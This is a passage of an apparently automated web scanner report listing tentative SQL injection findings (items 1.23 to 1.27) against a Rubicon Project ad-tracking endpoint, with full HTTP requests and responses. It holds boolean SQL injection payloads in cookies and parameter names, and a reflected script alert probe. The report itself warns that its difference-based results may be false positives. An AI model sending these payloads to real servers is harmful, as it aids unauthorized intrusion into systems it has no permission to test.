Cookie: au=GNQQ9N2W-FJJG-10.204.178.130; put_1994=1voofy6a0tk1w; put_1986=3420415245200633085; put_1512=4dd07bc8-e97b-118c-3dec-7b8c5c306530; put_2101=09035c0c-59c0-487e-ac6a-85a606e2b1c1; put_2132=C3D0C0AD058DDF4DC222CA3B02A8143B; put_2081=AG-00000001389358554; put_1185=4325897289836481830; ruid=154dd07bb6adc1d6f31bfa10^6^1307963581^2915161843; put_2054=c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4; xdp_ti="13 Jun 2011 11:13:38 GMT"; lm="13 Jun 2011 11:13:38 GMT"; cd=false; dq=9|4|5|0; khaos=GOVBRMNC-I-DXQD'%20and%201%3d2--%20; rpb=4940%3D1%264894%3D1%265852%3D1%264210%3D1%267259%3D1%265671%3D1%26733%3D1%264338%3D1%267100%3D1%266432%3D1%266560%3D1%266643%3D1%266198%3D1%264212%3D1%265576%3D1%265421%3D1%262827%3D1%265573%3D1%265720%3D1%262372%3D1%263810%3D1%262374%3D1%264214%3D1; put_1197=3460050161923843111

Response 2

HTTP/1.1 204 No Content
Date: Thu, 16 Jun 2011 11:27:55 GMT
Server: TRP Apache-Coyote/1.1
Cache-Control: no-store, no-cache, must-revalidate
Cache-control: private
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8


1.23. http://tap.rubiconproject.com/oz/sensor [lm cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://tap.rubiconproject.com
Path:   /oz/sensor

Issue detail

The lm cookie appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the lm cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /oz/sensor?p=rubicon&pc=6451/11953&cd=false&xt=12&k=southern+union:336,energy+transfer:320,buy+southern:184,4+billion:144,linkslist+documentid:136,current+datetime:136,cnbc:118,energy:114,southern:84,billion+cnbc:80,datetime+04:80,union:72,transfer:72,must+click:64,cnbc+welcomes:64,please+respect:64,cnbc+highlights:64,posted+yet:64,cnbc+reserves:64,related+links:64,asia+pacific:56,2011:56,2011+4:48,4+54:48,6+16:48,expiration+datetime:48,special+reports:48,datetime+6:48,16+2011:48,datetime:46,billion:46,transfer+equity:40,datetime+11:40,will+benefit:40,energy+news:40,equity+will:40,union+company:40,04+51:40,burgeoning+u:40,large+midstream:40,&t=Energy+Transfer+to+Buy+Southern+Union+for+$4.4+Billion+-+CNBC HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GNQQ9N2W-FJJG-10.204.178.130; put_1994=1voofy6a0tk1w; put_1986=3420415245200633085; put_1512=4dd07bc8-e97b-118c-3dec-7b8c5c306530; put_2101=09035c0c-59c0-487e-ac6a-85a606e2b1c1; put_2132=C3D0C0AD058DDF4DC222CA3B02A8143B; put_2081=AG-00000001389358554; put_1185=4325897289836481830; put_2054=c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4; xdp_ti="13 Jun 2011 11:13:38 GMT"; lm="13 Jun 2011 11:13:38 GMT"'%20and%201%3d1--%20; put_1197=3460050161923843111; khaos=GOVBRMNC-I-DXQD; rpb=4940%3D1%264894%3D1%265852%3D1%264210%3D1%267259%3D1%265671%3D1%26733%3D1%264338%3D1%267100%3D1%266432%3D1%266560%3D1%266643%3D1%266198%3D1%264212%3D1%265576%3D1%265421%3D1%262827%3D1%265573%3D1%265720%3D1%264214%3D1%262372%3D1; ruid=154dd07bb6adc1d6f31bfa10^7^1308225202^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; cd=false; dq=14|4|10|0; rdk=6451/11953; rdk15=0; ses15=11953^3; csi15=3187871.js^2^1308225219^1308225277&3206204.js^1^1308225202^1308225202

Response 1

HTTP/1.1 204 No Content
Date: Thu, 16 Jun 2011 12:12:16 GMT
Server: TRP Apache-Coyote/1.1
p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: Tue, 01 Jan 2008 00:12:30 GMT
Cache-control: private
Set-Cookie: cd=false; Domain=.rubiconproject.com; Expires=Fri, 15-Jun-2012 12:12:16 GMT; Path=/
Set-Cookie: dq=18|4|14|0; Expires=Fri, 15-Jun-2012 12:12:16 GMT; Path=/
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8

Request 2

GET /oz/sensor?p=rubicon&pc=6451/11953&cd=false&xt=12&k=southern+union:336,energy+transfer:320,buy+southern:184,4+billion:144,linkslist+documentid:136,current+datetime:136,cnbc:118,energy:114,southern:84,billion+cnbc:80,datetime+04:80,union:72,transfer:72,must+click:64,cnbc+welcomes:64,please+respect:64,cnbc+highlights:64,posted+yet:64,cnbc+reserves:64,related+links:64,asia+pacific:56,2011:56,2011+4:48,4+54:48,6+16:48,expiration+datetime:48,special+reports:48,datetime+6:48,16+2011:48,datetime:46,billion:46,transfer+equity:40,datetime+11:40,will+benefit:40,energy+news:40,equity+will:40,union+company:40,04+51:40,burgeoning+u:40,large+midstream:40,&t=Energy+Transfer+to+Buy+Southern+Union+for+$4.4+Billion+-+CNBC HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GNQQ9N2W-FJJG-10.204.178.130; put_1994=1voofy6a0tk1w; put_1986=3420415245200633085; put_1512=4dd07bc8-e97b-118c-3dec-7b8c5c306530; put_2101=09035c0c-59c0-487e-ac6a-85a606e2b1c1; put_2132=C3D0C0AD058DDF4DC222CA3B02A8143B; put_2081=AG-00000001389358554; put_1185=4325897289836481830; put_2054=c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4; xdp_ti="13 Jun 2011 11:13:38 GMT"; lm="13 Jun 2011 11:13:38 GMT"'%20and%201%3d2--%20; put_1197=3460050161923843111; khaos=GOVBRMNC-I-DXQD; rpb=4940%3D1%264894%3D1%265852%3D1%264210%3D1%267259%3D1%265671%3D1%26733%3D1%264338%3D1%267100%3D1%266432%3D1%266560%3D1%266643%3D1%266198%3D1%264212%3D1%265576%3D1%265421%3D1%262827%3D1%265573%3D1%265720%3D1%264214%3D1%262372%3D1; ruid=154dd07bb6adc1d6f31bfa10^7^1308225202^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; cd=false; dq=14|4|10|0; rdk=6451/11953; rdk15=0; ses15=11953^3; csi15=3187871.js^2^1308225219^1308225277&3206204.js^1^1308225202^1308225202

Response 2

HTTP/1.1 204 No Content
Date: Thu, 16 Jun 2011 12:12:16 GMT
Server: TRP Apache-Coyote/1.1
Cache-Control: no-store, no-cache, must-revalidate
Cache-control: private
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8


1.24. http://tap.rubiconproject.com/oz/sensor [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://tap.rubiconproject.com
Path:   /oz/sensor

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads %20and%201%3d1--%20 and %20and%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /oz/sensor?p=rubicon&pc=6451/11953&cd=false&xt=18&k=xss3a34b+script:168,script+7c5fa54ba36cca68:168,script+alert:160,script+script:160,script:126,7c5fa54ba36cca68+cnbc:88,cnbc+search:80,search+results:72,cnbc:66,sponsored+results:64,matching+symbols:64,refine+results:64,7c5fa54ba36cca68:44,xss3a34b:40,alert:40,matching+symbol:32,sponsored+result:32,search+result:32,refine+result:32,cnbc+pro:24,asia+pacific:16,refine:16,cnbc+tv:16,date:16,format:16,last:16,special+reports:16,sponsored:16,matching:16,symbols:16,video:14,days:12,stock+screener:8,ceo+interviews:8,symbol:8,earnings+front:8,special+report:8,markets:8,world+markets:8,member+center:8,&rd=burp&t=xss3a34b%3C/script%3E%3Cscript%3Ealert(1)%3C/script%3E7c5fa54ba36cca68+-+CNBC&1%20and%201%3d1--%20=1 HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://search.cnbc.com/main.do?target=all&keywords=xss3a34b%3C/script%3E%3Cscript%3Ealert(1)%3C/script%3E7c5fa54ba36cca68&categories=exclude&searchboxinput=xss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GNQQ9N2W-FJJG-10.204.178.130; put_1994=1voofy6a0tk1w; put_1986=3420415245200633085; put_1512=4dd07bc8-e97b-118c-3dec-7b8c5c306530; put_2101=09035c0c-59c0-487e-ac6a-85a606e2b1c1; put_2132=C3D0C0AD058DDF4DC222CA3B02A8143B; put_2081=AG-00000001389358554; put_1185=4325897289836481830; put_2054=c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4; xdp_ti="13 Jun 2011 11:13:38 GMT"; lm="13 Jun 2011 11:13:38 GMT"; put_1197=3460050161923843111; cd=false; dq=11|4|7|0; khaos=GOVBRMNC-I-DXQD; rpb=4940%3D1%264894%3D1%265852%3D1%264210%3D1%267259%3D1%265671%3D1%26733%3D1%264338%3D1%267100%3D1%266432%3D1%266560%3D1%266643%3D1%266198%3D1%264212%3D1%265576%3D1%265421%3D1%262827%3D1%265573%3D1%265720%3D1%264214%3D1%262372%3D1; ruid=154dd07bb6adc1d6f31bfa10^7^1308225202^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; rdk=6451/11953; rdk15=0; ses15=11953^1; csi15=3206204.js^1^1308225202^1308225202

Response 1

HTTP/1.1 204 No Content
Date: Thu, 16 Jun 2011 12:07:56 GMT
Server: TRP Apache-Coyote/1.1
p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: Tue, 01 Jan 2008 00:12:30 GMT
Cache-control: private
Set-Cookie: cd=false; Domain=.rubiconproject.com; Expires=Fri, 15-Jun-2012 12:07:56 GMT; Path=/
Set-Cookie: dq=17|4|13|0; Expires=Fri, 15-Jun-2012 12:07:56 GMT; Path=/
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8

Request 2

GET /oz/sensor?p=rubicon&pc=6451/11953&cd=false&xt=18&k=xss3a34b+script:168,script+7c5fa54ba36cca68:168,script+alert:160,script+script:160,script:126,7c5fa54ba36cca68+cnbc:88,cnbc+search:80,search+results:72,cnbc:66,sponsored+results:64,matching+symbols:64,refine+results:64,7c5fa54ba36cca68:44,xss3a34b:40,alert:40,matching+symbol:32,sponsored+result:32,search+result:32,refine+result:32,cnbc+pro:24,asia+pacific:16,refine:16,cnbc+tv:16,date:16,format:16,last:16,special+reports:16,sponsored:16,matching:16,symbols:16,video:14,days:12,stock+screener:8,ceo+interviews:8,symbol:8,earnings+front:8,special+report:8,markets:8,world+markets:8,member+center:8,&rd=burp&t=xss3a34b%3C/script%3E%3Cscript%3Ealert(1)%3C/script%3E7c5fa54ba36cca68+-+CNBC&1%20and%201%3d2--%20=1 HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://search.cnbc.com/main.do?target=all&keywords=xss3a34b%3C/script%3E%3Cscript%3Ealert(1)%3C/script%3E7c5fa54ba36cca68&categories=exclude&searchboxinput=xss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GNQQ9N2W-FJJG-10.204.178.130; put_1994=1voofy6a0tk1w; put_1986=3420415245200633085; put_1512=4dd07bc8-e97b-118c-3dec-7b8c5c306530; put_2101=09035c0c-59c0-487e-ac6a-85a606e2b1c1; put_2132=C3D0C0AD058DDF4DC222CA3B02A8143B; put_2081=AG-00000001389358554; put_1185=4325897289836481830; put_2054=c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4; xdp_ti="13 Jun 2011 11:13:38 GMT"; lm="13 Jun 2011 11:13:38 GMT"; put_1197=3460050161923843111; cd=false; dq=11|4|7|0; khaos=GOVBRMNC-I-DXQD; rpb=4940%3D1%264894%3D1%265852%3D1%264210%3D1%267259%3D1%265671%3D1%26733%3D1%264338%3D1%267100%3D1%266432%3D1%266560%3D1%266643%3D1%266198%3D1%264212%3D1%265576%3D1%265421%3D1%262827%3D1%265573%3D1%265720%3D1%264214%3D1%262372%3D1; ruid=154dd07bb6adc1d6f31bfa10^7^1308225202^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; rdk=6451/11953; rdk15=0; ses15=11953^1; csi15=3206204.js^1^1308225202^1308225202

Response 2

HTTP/1.1 204 No Content
Date: Thu, 16 Jun 2011 12:07:56 GMT
Server: TRP Apache-Coyote/1.1
Cache-Control: no-store, no-cache, must-revalidate
Cache-control: private
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8


1.25. http://tap.rubiconproject.com/oz/sensor [put_1185 cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://tap.rubiconproject.com
Path:   /oz/sensor

Issue detail

The put_1185 cookie appears to be vulnerable to SQL injection attacks. The payloads 18111862'%20or%201%3d1--%20 and 18111862'%20or%201%3d2--%20 were each submitted in the put_1185 cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /oz/sensor?p=rubicon&pc=6451/11953&cd=false&xt=14&k=southern+union:336,energy+transfer:320,buy+southern:184,4+billion:144,linkslist+documentid:136,current+datetime:136,cnbc:118,energy:114,union:86,billion+cnbc:80,southern:72,transfer:72,related+links:64,must+click:64,cnbc+reserves:64,please+respect:64,cnbc+highlights:64,cnbc+welcomes:64,posted+yet:64,2011:56,asia+pacific:56,datetime+05:56,special+reports:48,datetime+6:48,expiration+datetime:48,16+2011:48,2011+5:48,05+18:48,5+21:48,6+16:48,datetime:46,billion:46,equity+will:40,19+32:40,energy+news:40,will+benefit:40,will+buy:40,datetime+11:40,burgeoning+u:40,union+company:40,&t=Energy+Transfer+to+Buy+Southern+Union+for+$4.4+Billion+-+CNBC HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GNQQ9N2W-FJJG-10.204.178.130; put_1994=1voofy6a0tk1w; put_1986=3420415245200633085; put_1512=4dd07bc8-e97b-118c-3dec-7b8c5c306530; put_2101=09035c0c-59c0-487e-ac6a-85a606e2b1c1; put_2132=C3D0C0AD058DDF4DC222CA3B02A8143B; put_2081=AG-00000001389358554; put_1185=432589728983648183018111862'%20or%201%3d1--%20; put_2054=c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4; xdp_ti="13 Jun 2011 11:13:38 GMT"; lm="13 Jun 2011 11:13:38 GMT"; put_1197=3460050161923843111; khaos=GOVBRMNC-I-DXQD; rpb=4940%3D1%264894%3D1%265852%3D1%264210%3D1%267259%3D1%265671%3D1%26733%3D1%264338%3D1%267100%3D1%266432%3D1%266560%3D1%266643%3D1%266198%3D1%264212%3D1%265576%3D1%265421%3D1%262827%3D1%265573%3D1%265720%3D1%264214%3D1%262372%3D1; ruid=154dd07bb6adc1d6f31bfa10^7^1308225202^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; cd=false; dq=18|4|14|0; ses2=11953^2; csi2=3187870.js^2^1308226504^1308226815; rdk=6451/11953; rdk15=0; ses15=11953^7; csi15=3187871.js^5^1308225219^1308226816&3206204.js^2^1308225202^1308225888

Response 1

HTTP/1.1 204 No Content
Date: Thu, 16 Jun 2011 13:08:33 GMT
Server: TRP Apache-Coyote/1.1
p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: Tue, 01 Jan 2008 00:12:30 GMT
Cache-control: private
Set-Cookie: cd=false; Domain=.rubiconproject.com; Expires=Fri, 15-Jun-2012 13:08:33 GMT; Path=/
Set-Cookie: dq=27|4|23|0; Expires=Fri, 15-Jun-2012 13:08:33 GMT; Path=/
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8

Request 2

GET /oz/sensor?p=rubicon&pc=6451/11953&cd=false&xt=14&k=southern+union:336,energy+transfer:320,buy+southern:184,4+billion:144,linkslist+documentid:136,current+datetime:136,cnbc:118,energy:114,union:86,billion+cnbc:80,southern:72,transfer:72,related+links:64,must+click:64,cnbc+reserves:64,please+respect:64,cnbc+highlights:64,cnbc+welcomes:64,posted+yet:64,2011:56,asia+pacific:56,datetime+05:56,special+reports:48,datetime+6:48,expiration+datetime:48,16+2011:48,2011+5:48,05+18:48,5+21:48,6+16:48,datetime:46,billion:46,equity+will:40,19+32:40,energy+news:40,will+benefit:40,will+buy:40,datetime+11:40,burgeoning+u:40,union+company:40,&t=Energy+Transfer+to+Buy+Southern+Union+for+$4.4+Billion+-+CNBC HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GNQQ9N2W-FJJG-10.204.178.130; put_1994=1voofy6a0tk1w; put_1986=3420415245200633085; put_1512=4dd07bc8-e97b-118c-3dec-7b8c5c306530; put_2101=09035c0c-59c0-487e-ac6a-85a606e2b1c1; put_2132=C3D0C0AD058DDF4DC222CA3B02A8143B; put_2081=AG-00000001389358554; put_1185=432589728983648183018111862'%20or%201%3d2--%20; put_2054=c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4; xdp_ti="13 Jun 2011 11:13:38 GMT"; lm="13 Jun 2011 11:13:38 GMT"; put_1197=3460050161923843111; khaos=GOVBRMNC-I-DXQD; rpb=4940%3D1%264894%3D1%265852%3D1%264210%3D1%267259%3D1%265671%3D1%26733%3D1%264338%3D1%267100%3D1%266432%3D1%266560%3D1%266643%3D1%266198%3D1%264212%3D1%265576%3D1%265421%3D1%262827%3D1%265573%3D1%265720%3D1%264214%3D1%262372%3D1; ruid=154dd07bb6adc1d6f31bfa10^7^1308225202^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; cd=false; dq=18|4|14|0; ses2=11953^2; csi2=3187870.js^2^1308226504^1308226815; rdk=6451/11953; rdk15=0; ses15=11953^7; csi15=3187871.js^5^1308225219^1308226816&3206204.js^2^1308225202^1308225888

Response 2

HTTP/1.1 204 No Content
Date: Thu, 16 Jun 2011 13:08:33 GMT
Server: TRP Apache-Coyote/1.1
Cache-Control: no-store, no-cache, must-revalidate
Cache-control: private
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8


1.26. http://tap.rubiconproject.com/oz/sensor [put_1197 cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://tap.rubiconproject.com
Path:   /oz/sensor

Issue detail

The put_1197 cookie appears to be vulnerable to SQL injection attacks. The payloads 17119375'%20or%201%3d1--%20 and 17119375'%20or%201%3d2--%20 were each submitted in the put_1197 cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /oz/sensor?p=rubicon&pc=6451/11953&cd=false&xt=15&k=southern+union:336,energy+transfer:320,buy+southern:184,4+billion:144,current+datetime:136,linkslist+documentid:136,cnbc:118,energy:114,union:86,billion+cnbc:80,transfer:72,southern:72,related+links:64,posted+yet:64,cnbc+welcomes:64,cnbc+highlights:64,please+respect:64,cnbc+reserves:64,must+click:64,2011:56,asia+pacific:56,datetime+05:56,6+16:48,2011+5:48,16+2011:48,datetime+6:48,special+reports:48,expiration+datetime:48,billion:46,datetime:46,will+benefit:40,will+buy:40,11+billion:40,equity+will:40,5+30:40,energy+news:40,datetime+11:40,55+16:40,burgeoning+u:40,union+company:40,&t=Energy+Transfer+to+Buy+Southern+Union+for+$4.4+Billion+-+CNBC HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GNQQ9N2W-FJJG-10.204.178.130; put_1994=1voofy6a0tk1w; put_1986=3420415245200633085; put_1512=4dd07bc8-e97b-118c-3dec-7b8c5c306530; put_2101=09035c0c-59c0-487e-ac6a-85a606e2b1c1; put_2132=C3D0C0AD058DDF4DC222CA3B02A8143B; put_2081=AG-00000001389358554; put_1185=4325897289836481830; put_2054=c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4; xdp_ti="13 Jun 2011 11:13:38 GMT"; lm="13 Jun 2011 11:13:38 GMT"; put_1197=346005016192384311117119375'%20or%201%3d1--%20; khaos=GOVBRMNC-I-DXQD; ruid=154dd07bb6adc1d6f31bfa10^7^1308225202^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; rpb=4940%3D1%264894%3D1%265852%3D1%264210%3D1%267259%3D1%265671%3D1%26733%3D1%264338%3D1%267100%3D1%266432%3D1%266560%3D1%266643%3D1%266198%3D1%264212%3D1%265576%3D1%265421%3D1%265573%3D1%265720%3D1%264214%3D1%262372%3D1; cd=false; dq=20|4|16|0; ses2=11953^4; csi2=3187870.js^3^1308226504^1308227440&3183300.js^1^1308227126^1308227126; rdk=6451/11953; ses15=11953^9; csi15=3187871.js^6^1308225219^1308227440&3206204.js^3^1308225202^1308227128

Response 1

HTTP/1.1 204 No Content
Date: Thu, 16 Jun 2011 13:11:36 GMT
Server: TRP Apache-Coyote/1.1
p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: Tue, 01 Jan 2008 00:12:30 GMT
Cache-control: private
Set-Cookie: cd=false; Domain=.rubiconproject.com; Expires=Fri, 15-Jun-2012 13:11:36 GMT; Path=/
Set-Cookie: dq=27|4|23|0; Expires=Fri, 15-Jun-2012 13:11:36 GMT; Path=/
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8

Request 2

GET /oz/sensor?p=rubicon&pc=6451/11953&cd=false&xt=15&k=southern+union:336,energy+transfer:320,buy+southern:184,4+billion:144,current+datetime:136,linkslist+documentid:136,cnbc:118,energy:114,union:86,billion+cnbc:80,transfer:72,southern:72,related+links:64,posted+yet:64,cnbc+welcomes:64,cnbc+highlights:64,please+respect:64,cnbc+reserves:64,must+click:64,2011:56,asia+pacific:56,datetime+05:56,6+16:48,2011+5:48,16+2011:48,datetime+6:48,special+reports:48,expiration+datetime:48,billion:46,datetime:46,will+benefit:40,will+buy:40,11+billion:40,equity+will:40,5+30:40,energy+news:40,datetime+11:40,55+16:40,burgeoning+u:40,union+company:40,&t=Energy+Transfer+to+Buy+Southern+Union+for+$4.4+Billion+-+CNBC HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GNQQ9N2W-FJJG-10.204.178.130; put_1994=1voofy6a0tk1w; put_1986=3420415245200633085; put_1512=4dd07bc8-e97b-118c-3dec-7b8c5c306530; put_2101=09035c0c-59c0-487e-ac6a-85a606e2b1c1; put_2132=C3D0C0AD058DDF4DC222CA3B02A8143B; put_2081=AG-00000001389358554; put_1185=4325897289836481830; put_2054=c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4; xdp_ti="13 Jun 2011 11:13:38 GMT"; lm="13 Jun 2011 11:13:38 GMT"; put_1197=346005016192384311117119375'%20or%201%3d2--%20; khaos=GOVBRMNC-I-DXQD; ruid=154dd07bb6adc1d6f31bfa10^7^1308225202^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; rpb=4940%3D1%264894%3D1%265852%3D1%264210%3D1%267259%3D1%265671%3D1%26733%3D1%264338%3D1%267100%3D1%266432%3D1%266560%3D1%266643%3D1%266198%3D1%264212%3D1%265576%3D1%265421%3D1%265573%3D1%265720%3D1%264214%3D1%262372%3D1; cd=false; dq=20|4|16|0; ses2=11953^4; csi2=3187870.js^3^1308226504^1308227440&3183300.js^1^1308227126^1308227126; rdk=6451/11953; ses15=11953^9; csi15=3187871.js^6^1308225219^1308227440&3206204.js^3^1308225202^1308227128

Response 2

HTTP/1.1 204 No Content
Date: Thu, 16 Jun 2011 13:11:36 GMT
Server: TRP Apache-Coyote/1.1
Cache-Control: no-store, no-cache, must-revalidate
Cache-control: private
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8


1.27. http://tap.rubiconproject.com/oz/sensor [put_1512 cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://tap.rubiconproject.com
Path:   /oz/sensor

Issue detail

The put_1512 cookie appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the put_1512 cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

